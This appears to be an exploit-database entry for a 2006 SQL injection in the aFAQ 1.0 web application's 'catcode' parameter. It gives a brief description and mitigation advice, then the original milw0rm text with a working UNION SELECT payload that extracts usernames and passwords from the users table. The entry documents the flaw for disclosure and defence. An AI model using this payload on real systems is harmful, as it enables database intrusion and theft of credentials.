header-logo
Suggest Exploit
vendor:
aFAQ
by:
ajann
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: aFAQ
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

aFAQ 1.0 (catcode) Remote SQL Injection Vulnerability

aFAQ 1.0 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a malicious SQL query to the vulnerable parameter 'catcode' in the 'faqDsp.asp' script. This can allow an attacker to gain access to the database and potentially gain access to sensitive information.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use the least privileged account with access to the database.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  aFAQ 1.0 (catcode) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.alanward.net
# $$      :  Free
*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//faqDsp.asp?catcode=[SQL]

Example:

//faqDsp.asp?catcode=-1%20union%20select%20username,password,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-28]

Navigation

Suggest Exploit

Services By CQR